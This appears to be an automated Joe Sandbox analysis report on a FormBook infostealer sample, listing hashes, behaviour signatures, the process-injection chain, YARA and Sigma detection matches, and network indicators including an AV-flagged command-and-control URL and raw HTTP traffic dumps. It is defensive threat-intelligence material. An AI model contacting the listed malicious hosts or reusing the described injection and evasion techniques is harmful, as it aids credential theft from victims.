Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
031215-Revised-01.exe

Overview

General Information

Sample name:031215-Revised-01.exe
Analysis ID:1499198
MD5:1bf161b2bc2c8efddf6fbc402dfb9508
SHA1:0525fb1f6e537a26faf3438b1d5d9e118e3a9a52
SHA256:99e143144585b210119ead96a354e3425f4b84a58a7554de9e89aa3a9154c21f
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 031215-Revised-01.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\031215-Revised-01.exe" MD5: 1BF161B2BC2C8EFDDF6FBC402DFB9508)
    • svchost.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\031215-Revised-01.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • EsAzcOtjoknfjP.exe (PID: 3120 cmdline: "C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • EsAzcOtjoknfjP.exe (PID: 5356 cmdline: "C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8144 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.2680000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.2680000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.2680000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.2680000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious RASdial Activity
            Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe" , ParentImage: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe, ParentProcessId: 3120, ParentProcessName: EsAzcOtjoknfjP.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 7964, ProcessName: rasdial.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\031215-Revised-01.exe", CommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", ParentImage: C:\Users\user\Desktop\031215-Revised-01.exe, ParentProcessId: 7568, ParentProcessName: 031215-Revised-01.exe, ProcessCommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", ProcessId: 7624, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\031215-Revised-01.exe", CommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", ParentImage: C:\Users\user\Desktop\031215-Revised-01.exe, ParentProcessId: 7568, ParentProcessName: 031215-Revised-01.exe, ProcessCommandLine: "C:\Users\user\Desktop\031215-Revised-01.exe", ProcessId: 7624, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.weep.site/v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyhAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: 031215-Revised-01.exeReversingLabs: Detection: 36%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 031215-Revised-01.exeJoe Sandbox ML: detected
            Source: 031215-Revised-01.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005677957.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3518322443.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 031215-Revised-01.exe, 00000000.00000003.1722823360.0000000003C90000.00000004.00001000.00020000.00000000.sdmp, 031215-Revised-01.exe, 00000000.00000003.1722915545.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1988264007.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1990149882.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2084604112.0000000004AF7000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2082199541.000000000494A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000003.2048949385.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082015604.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519140397.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000003.2022839574.00000000011CB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 031215-Revised-01.exe, 00000000.00000003.1722823360.0000000003C90000.00000004.00001000.00020000.00000000.sdmp, 031215-Revised-01.exe, 00000000.00000003.1722915545.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2082183945.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1988264007.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1990149882.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.3519880403.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2084604112.0000000004AF7000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2082199541.000000000494A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000003.2048949385.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082015604.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519140397.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000003.2022839574.00000000011CB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.3520253093.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2155169663.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000A95C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.3520253093.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2155169663.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000A95C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_000DDBBE
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E68EE FindFirstFileW,FindClose,0_2_000E68EE
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000E698F
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_000DD076
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_000DD3A9
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000E9642
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000E979D
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000E9B2B
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000E5C97
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BCC420 FindFirstFileW,FindNextFileW,FindClose,6_2_02BCC420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax6_2_02BB9B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then pop edi6_2_02BBE109
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h6_2_04B804DF

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.jaxo.xyz
            Source: Joe Sandbox ViewIP Address: 167.172.133.32 167.172.133.32
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000ECE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_000ECE44
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 26 Aug 2024 16:28:59 GMTserver: Apacheset-cookie: __tad=1724689739.4296456; expires=Thu, 24-Aug-2034 16:28:59 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 26 Aug 2024 16:29:01 GMTserver: Apacheset-cookie: __tad=1724689741.3310780; expires=Thu, 24-Aug-2034 16:29:01 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 26 Aug 2024 16:29:04 GMTserver: Apacheset-cookie: __tad=1724689744.5631408; expires=Thu, 24-Aug-2034 16:29:04 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
